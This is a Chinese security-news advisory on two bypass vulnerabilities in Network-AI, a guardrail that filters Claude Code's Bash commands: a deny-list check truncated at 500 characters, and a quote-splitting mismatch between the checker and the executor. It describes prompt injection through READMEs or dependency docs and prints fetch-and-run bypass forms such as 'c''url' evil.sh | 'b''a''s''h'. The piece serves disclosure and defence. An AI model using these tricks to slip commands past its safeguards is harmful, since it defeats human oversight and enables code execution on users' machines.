紧急预警|CVE-2026-73614/73615|给AI拴的缰绳自己断了:Network-AI安全护栏双绕过

admin 2026-08-23 05:01:30 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: Network-AI(ClaudeHookBridge/SandboxPolicy)存在两个严重绕过漏洞(CVE-2026-73614/73615)。CVE-2026-73614利用安全检查仅截取前500字符的缺陷,将恶意命令置于其后以绕过黑名单。CVE-2026-73615利用检查器与执行器对引号处理逻辑的差异,通过拆分引号绕过检测。攻击者可通过提示注入诱导AI执行任意命令。核心风险是绕过安全护栏实现远程代码执行。建议立即升级至5.15.1+版本,并实施纵深防御策略,如OS级隔离和命令异常监控。 综合评分: 90 文章分类: 漏洞分析,应急响应,安全意识,安全工具,解决方案


cover_image

紧急预警 | CVE-2026-73614 / 73615 | 给 AI 拴的缰绳自己断了:Network-AI 安全护栏双绕过

撅人

2026年8月17日 00:00 广东

在小说阅读器读本章

去阅读

用 Claude Code 干活的、给团队配 AI 安全策略的,停一停手里的事!

Network-AI(ClaudeHookBridge / SandboxPolicy 那套用来管住 Claude Code 行为的护栏)一次被挖出两个绕过洞:一个靠把危险内容藏到第 500 个字符之后躲过黑名单,一个靠加引号骗过检查器、执行器再脱引号跑真命令。

说白了:安检仪扫的是 A 包,实际放行的是 B 包。你精心配置的 hard-deny 列表、审批门禁,在攻击者眼里是纸糊的。

5.15.1 之前的版本全部中招。

📋 漏洞速览

| | | | — | — | | 漏洞编号 | CVE-2026-73614 / CVE-2026-73615 | | 影响产品 | Network-AI(ClaudeHookBridge / SandboxPolicy) | | 受影响版本 | < 5.15.1 | | 安全版本 | ≥ 5.15.1 | | 漏洞类型 | 安全检查绕过(截断绕过 / 引用不匹配绕过) | | 攻击前提 | 攻击者可影响 AI 生成/提交的 Bash 命令(提示注入、恶意仓库等) | | 核心风险 | 绕过 hard-deny 黑名单和审批门禁,执行任意命令 | | 利用情况 | 暂无公开利用 | | 披露时间 | 2026-08-13 |

💥 核心危害:攻击者能做什么?

1️⃣ CVE-2026-73614:第 500 个字符之后的”法外之地”

ClaudeHookBridge 在拿命令去匹配 denyPatterns(你的硬拒绝列表)之前,先把目标字符串截断到 500 个字符。而 Claude Code 实际执行的是完整的、未截断的命令

于是攻击者的操作简单到离谱:前面塞 500 个字符的无害填充(注释、空格、无关参数随便凑),把 curl 恶意脚本 | bash 这类真家伙放到第 501 个字符之后——安检看的是前 500 字,行刑的是全文

2️⃣ CVE-2026-73615:引号的两副面孔

SandboxPolicy 检查命令时保留引号原样匹配,而执行器在执行前先脱引号做分词

攻击者给危险命令套上引号:"c""url" evil.sh | "b""a""s""h" 这种形态,黑名单匹配不上(字符串里断断续续),审批门禁也认不出——但执行器脱完引号 tokenize 之后,跑的就是一毛一样的危险 argv

两个洞叠加的恐怖之处:你以为 AI 只能在白名单里活动,实际上提示注入一段恶意 README、一个带毒的依赖文档,就能让 AI 的 Bash 工具在你机器上执行任意命令——全程绿灯,日志里看起来还人畜无害

🧠 漏洞原理(人话版)

73614 —— 尺子只量半根绳子

“安全检查”:命令[:500]

拿前 500 字符去匹配 denyPatterns

“实际执行”:完整命令

Claude Code 跑的是全文

截断本意可能是防止超长输入拖慢匹配,但检查对象和执行对象从此分家。安全检查的铁律:验什么,就得执行什么。截断检查 = 检查了个寂寞。

73615 —— 检查器和执行器说的不是同一种语言

“安全检查”:'”c””url” evil.sh’

带引号原样匹配黑名单 → 不命中

“实际执行”:tokenize + 脱引号

argv = [curl, evil.sh] → 精准命中危险

一个是”字符串包含”逻辑,一个是”shell 分词”逻辑。两种语义之间有条缝,攻击者就住在这条缝里。

攻击流程 3 步走:

  1. 攻击者在 AI 可读的内容里埋提示注入(恶意 README、issue、依赖文档)

  2. 诱导 AI 生成一条”前 500 字符无害”或”引号拆分”的 Bash 命令

  3. 护栏检查通过 → 执行器运行真实危险命令 → 任意代码执行,日志无告警

🔍 3 秒自查

红区(中招):Network-AI < 5.15.1

绿区(安全):Network-AI ≥ 5.15.1

看版本:

pip show network-ai | grep Version

或按部署方式查看 ClaudeHookBridge / SandboxPolicy 版本

再灵魂三问:

  • 团队里是否用 Network-AI 给 Claude Code / AI Agent 做命令管控?

  • 配置里的 denyPatterns / blocklist 是否是唯一防线?有没有假设”AI 跑不了危险命令”?

  • AI 工作环境的文件系统和网络权限,是不是默认全开?

第三问答”是”的,这个洞对你们就是裸奔级别的。

🛠️ 修复方案

方案一:升级到 5.15.1+(根治,立刻做)

pip install –upgrade network-ai

或按部署渠道更新到 >= 5.15.1

升级后验证:官方 advisory 确认 5.15.1 同时修复截断和引用匹配两个问题。

方案二:纵深防御(升级前后的保命符)

– 永远不要单靠字符串黑名单:denyPatterns 只能当第一道滤网,AI 的执行环境要有 OS 层隔离(容器、沙箱账号、最小权限)

  • 审批门禁开启人工确认的关键命令类别(网络下载+执行、写系统路径、凭据访问),别信自动放行

  • 对 AI 生成命令做长度异常监控:超长命令(尤其 500+ 字符的 Bash)本身就是可疑信号

  • 收紧 AI 工作目录的文件系统和出网权限,就算护栏漏了,攻击者能摸到的面也有限

方案三:架构反思

这批漏洞给所有 AI 安全工具提了个醒:检查逻辑和执行逻辑只要不是同一套解析器,就一定存在绕过空间。选型时优先考察工具是否用同一 tokenize 管道做检查和执行,而不是”字符串长得像就拦”。

入侵排查清单:

  • 翻 AI 会话/命令日志:有没有超长 Bash 命令被放行的记录

  • 搜索日志中带异常引号模式的命令("c""url""b""a""s""h" 之类拆分形态)

  • 检查 AI 工作目录下最近新增的可执行文件、定时任务、SSH authorized_keys 变更

  • 排查机器是否有非常规出网连接(curl/wget 到陌生域名)

⚠️ 安全提醒

AI 安全工具的洞,比普通软件的洞更值得警惕——因为所有人都默认它在尽职。护栏失灵的 AI Agent,等于一台会自己敲键盘、还带着你权限的远程木马。

5.15.1 一个版本修完两个洞,升级是分钟级的事。而提示注入的攻击成本,是秒级的。

用 AI 编程的团队都转发一下——尤其那些给 Claude Code 配了管控就高枕无忧的负责人,你们的”高枕”,今天有个洞。

官方参考:

GHSA-743h-jr5x-mpcr(73614)

GHSA-9v4f-j8cv-fhxw(73615)


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:撅人 《紧急预警 | CVE-2026-73614 / 73615 | 给 AI 拴的缰绳自己断了:Network-AI 安全护栏双绕过》

记一次小程序渗透 网络安全文章

记一次小程序渗透

文章总结: 本文记录了一次小程序渗透测试过程,作者手工测试发现大量三要素及敏感数据泄露,强调手工渗透在自动化工具失效时仍有效,建议加强小程序接口安全防护。 综合
评论:0   参与:  0